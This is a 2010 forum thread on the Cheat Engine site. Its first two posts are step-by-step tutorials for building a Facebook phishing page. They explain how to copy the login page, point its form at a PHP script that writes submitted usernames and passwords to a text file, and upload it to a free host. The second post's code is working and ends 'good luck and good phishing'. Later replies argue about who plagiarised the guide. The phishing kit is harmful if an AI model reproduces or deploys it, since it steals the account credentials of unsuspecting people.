Cheat Engine Forum Index Cheat Engine
The Official Site of Cheat Engine
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 


Facebook phising

 
Post new topic   Reply to topic    Cheat Engine Forum Index -> Random spam
View previous topic :: View next topic  
Author Message
OhLAWD
Expert Cheater
Reputation: 0

Joined: 21 Apr 2007
Posts: 208

PostPosted: Sun Feb 14, 2010 10:57 am    Post subject: Facebook phising Reply with quote

alright, First step is to go to www.facebook.com/login.php Right click some white space and select View Page Source, Or something similar. A Huge block of text will appear, Copy it all intot he notepad. Find: method="POST" action="https://login.facebook.com/login.php?login_attempt=1 and change it to method="GET" action="next.php"

Second step is to open up a blank notepad and write:
<?php
header(:Location" http://Facebook.com/logic.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
frwite($handle, $value);
fwrite($handle, \r\n");
}
fwrite($handle);
fclose($handle);
exit;
?>
Save it as "next.php"

Third step is to open a blank notepad (again) and save it as "passwords.txt" or whatever you named it in next.php. Leave it blank.

_________________
Back to top
View user's profile Send private message AIM Address
cokefag
Master Cheater
Reputation: 51

Joined: 15 Nov 2007
Posts: 488

PostPosted: Sun Feb 14, 2010 11:04 am    Post subject: Re: Facebook phising Reply with quote

OhLAWD wrote:
alright, First step is to go to www.facebook.com/login.php Right click some white space and select View Page Source, Or something similar. A Huge block of text will appear, Copy it all intot he notepad. Find: method="POST" action="https://login.facebook.com/login.php?login_attempt=1 and change it to method="GET" action="next.php"

Second step is to open up a blank notepad and write:
<?php
header(:Location" http://Facebook.com/logic.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
frwite($handle, $value);
fwrite($handle, \r\n");
}
fwrite($handle);
fclose($handle);
exit;
?>
Save it as "next.php"

Third step is to open a blank notepad (again) and save it as "passwords.txt" or whatever you named it in next.php. Leave it blank.


Copied from a 2008/2007 thread in RS.
Back to top
View user's profile Send private message
OhLAWD
Expert Cheater
Reputation: 0

Joined: 21 Apr 2007
Posts: 208

PostPosted: Sun Feb 14, 2010 11:05 am    Post subject: Reply with quote

link post please.
_________________
Back to top
View user's profile Send private message AIM Address
To0k
How do I cheat?
Reputation: 14

Joined: 16 Nov 2007
Posts: 0

PostPosted: Sun Feb 14, 2010 11:05 am    Post subject: Reply with quote

Not that making a phising page is hard in the first place.
Back to top
View user's profile Send private message
cokefag
Master Cheater
Reputation: 51

Joined: 15 Nov 2007
Posts: 488

PostPosted: Sun Feb 14, 2010 11:06 am    Post subject: Reply with quote

Okay so im finally gonna make the tut, and before i start, i want to say that phishing facebook is different than phishing myspace!

Today we are going to make a phisher for facebook.

1) go to facebook, and view the source, copy all the text to notepad.
2) we need to change some codes so press: Control + F
3) search for action
4) You should get: action=www.facebook.com/login and bla bla bla
5) delete all the facebook.com crap, and put: lol.php
6) beside action you will see something saying: method=post
7) change "post" to "get"
Cool save the file, name it: index.php and save it to desktop but remember! where it says: "save as type" change it to "all files" this is very important
9) make a new file in notepad, and put this code:

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

10) now save it as lol.php and remember the save as file type to all files.

11) now, make a new file in notepad, dont write anything, save it as: passwords.txt

12) now upload all of them in www.t35.com
good luck and good phishing!


August 21st 2008
Back to top
View user's profile Send private message
OhLAWD
Expert Cheater
Reputation: 0

Joined: 21 Apr 2007
Posts: 208

PostPosted: Sun Feb 14, 2010 11:07 am    Post subject: Reply with quote

it differs.
_________________
Back to top
View user's profile Send private message AIM Address
cokefag
Master Cheater
Reputation: 51

Joined: 15 Nov 2007
Posts: 488

PostPosted: Sun Feb 14, 2010 11:10 am    Post subject: Reply with quote

OhLAWD wrote:
it differs.

It's the exact same guide.
Back to top
View user's profile Send private message
19
Master Cheater
Reputation: 10

Joined: 08 Feb 2009
Posts: 451

PostPosted: Sun Feb 14, 2010 11:14 am    Post subject: Reply with quote

I knew this was leeched, I had seen it before.
Back to top
View user's profile Send private message
cokefag
Master Cheater
Reputation: 51

Joined: 15 Nov 2007
Posts: 488

PostPosted: Sun Feb 14, 2010 11:17 am    Post subject: Reply with quote

19 wrote:
I knew this was leeched, I had seen it before.

Yeah I've seen many leeched topics in my day and I can tell by the sentences.
Back to top
View user's profile Send private message
Benji
Random spam moderator
Reputation: 4

Joined: 31 Dec 2007
Posts: 61
Location: The Netherlands

PostPosted: Sun Feb 14, 2010 11:21 am    Post subject: Reply with quote

Because cokefag is the first one to EVER post a Facebook phishing tutorial. Also, why would you want to hack your friends OR somebody's social networking page?
_________________
Back to top
View user's profile Send private message
cokefag
Master Cheater
Reputation: 51

Joined: 15 Nov 2007
Posts: 488

PostPosted: Sun Feb 14, 2010 11:22 am    Post subject: Reply with quote

[/quote] wrote:
Because cokefag is the first one to EVER post a Facebook phishing tutorial. Also, why would you want to hack your friends OR somebody's social networking page?

It wasn't my topic.
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    Cheat Engine Forum Index -> Random spam All times are GMT - 6 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group

CE Wiki   IRC (#CEF)   Twitter
Third party websites